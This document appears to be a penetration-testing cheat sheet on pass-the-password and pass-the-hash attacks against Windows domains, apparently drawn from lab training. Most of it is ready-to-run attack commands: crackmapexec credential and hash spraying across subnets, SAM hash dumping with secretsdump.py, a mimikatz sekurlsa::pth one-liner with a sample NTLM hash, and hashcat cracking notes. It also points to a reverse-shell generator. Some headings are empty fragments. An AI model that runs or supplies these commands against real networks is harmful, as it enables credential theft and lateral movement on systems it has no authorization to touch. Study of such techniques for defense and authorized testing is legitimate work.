Pass the Password or Pass the Hash
crackmapexec
Then use the following to try the password against the other machines on the network:
crackmapexec smb 192.168.161.0/24 -u <user> -d MARVEL.local -p <Password>

Use --sam to dump SAM hashes

Can then use psexec to get a shell with
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
Try --local-auth too.
secretsdump.py
Use secretsdump.py to dump information such as the SAM hashes.

We can pass these hashes and try to pwn the other machines on the network
Save the SAM hashes in a text file.
Mimikatz
/user - The user name we want to impersonate.
/rc4 or /NTLM - NTLM hash of the user's password.
/domain - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.).
/run - The program we want to run with the user's context (if not specified, it will launch cmd.exe).
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
Target - Hostname or IP address of the target.
Username - Username to use for authentication.
Domain - Domain to use for authentication. This parameter is unnecessary with local accounts or when using the @domain after the username.
Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
Command - Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.
A reverse shell can also be obtained this way; refer to https://www.revshells.com/

Impacket psexec
Evil-winrm
RDP
Allow pth
To connect
Cracking with hashcat
NOTE: _Only NTLM hashes can be passed, not NTLMv2._ Use -m 1000 (NTLM) to crack them with hashcat.
Pass the Hash
Only the second half of the hash (the NTLM part of LM:NTLM) is required to pass the hash. To get a shell we can use psexec: